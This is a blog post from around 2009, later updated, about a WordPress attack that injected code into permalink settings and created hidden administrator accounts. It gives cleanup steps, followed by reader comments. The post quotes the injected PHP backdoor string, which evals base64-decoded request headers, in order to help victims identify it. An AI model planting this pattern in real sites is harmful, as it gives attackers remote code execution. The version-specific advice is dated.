Blogging, Wordpress

UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Update 2013:

This post is way old, but people using WordPress still get hacked constantly, so this post we put together may be of some help if you are having problems with wordpress security!

6 Simple Steps To Better WordPress Security

Hey Guys,

Just realized that a lot of people were hit with this latest WordPress Blog Attack – Its a MySQL Injection that screws up your permalinks and in turn makes you blog post links not work! So I figured i’d write up this quick post to help some people out!

It appears that yesterday, many wordpress blogs got hit with this nasty hack that appended a
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or a
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

to your permalinks which rendered your blog post links useless unless someone physically removed the infected string of code from the URL

To fix things:

  • go to Setting->Permalinks and delete the above mean code

  • go to users, you will notice there are more administrators than usual

  • Put your mouse over the users and find the one that is last to register

  • Right click and copy the edit url, then paste it into the address bar. Also increase the number by 1.

  • You should find the hidden admin with a weird code as a first name. Delete the code and make him a subscriber then return to users and delete him.
    This should fix it. Don’t forget to upgrade your blog to the latest version.

Hope this helps everyone! You can also delete the hidden user from PHPMyAdmin directly from the database, whatever you are comfortable with.

UPDATE: Mashable has written about this issue here.

NEWEST UPDATE: WordPress Responds to Attacks

NEWEST UPDATE: OFFICIAL RESPONSE FROM WORDPRESS

Here are some other good posts on the topic and have other examples that may be more specific to your issue:

http://www.warriorforum.com/main-internet-marketing-discussion-forum/121131-wordpress-mysql-injection-latest-attack-eval-base64_decode-_server-http_referer.html

http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

You Might Also Like

12 Comments

  1. 1
  2. 2

    I just deleted the users, but did not delete the user name with a weird code is that enough? also changed cpanel, db and wp passwords?

  3. 4

    Damn. My wordpress is up to date, there’s no extra junk in my permalinks settings and there’s no additional users. But all my links are stuffed. A;; the symptoms of the current bug. I can’t find any info anywhere other than to make sure it’s the latest version which it is. Don’t tell me I have to do a fresh install. Arrrrrggggh!

  4. 5

    Please be careful before spreading information that isn’t proven; it’s most likely that your system was compromised before your upgrade to 2.8.4. Have you looked at your server logs yet? Do you know when the compromise occurred, how it occurred, and which version of WP you were running at that time? THIS is the info we need before we can state which version of WP has a vulnerability.

  5. 7

    This was fixed in a round-about way by WordPress 2.8.1

    WordPress 2.8.4 is not vulnerable. It is, however, possible that you were compromised before upgrading, and they still have a user account or have placed an exploit file on your server to allow for ongoing access. Delete user accounts you don’t recognize, and remove foreign PHP files.

    • 8

      Thanks Mark for chiming in with that info, That could have very well been what happened, Although the attackers must have been planning this for some time then, because there are countless blogs that were attacked the past day or so, Thanks for working hard to defend these attacks!

  6. 9

    Yes you are correct, I read that as well, BUT Do not know if its 100% Accurate, if that is the case tho then wordpress will have to release 2.8.5 immediately, within the next week

  7. 10

    sadly none of these links provide a “fix”… it simply tells you how to scoop up the water flowing in with a tea spoon =/

    • 11

      Yes unfortunately right now the only thing you can do is update to latest wordpress, and if that doesn’t provide a permanent fix, WordPress will most definitely release 2.8.5 immediately, I will update this post with the latest information

      • 12

        hmmm thought i read the vuln. hits 2.8.4 also? (which is the latest) sorry if i’m wrong. can’t go back and check at the moment

Comments are closed.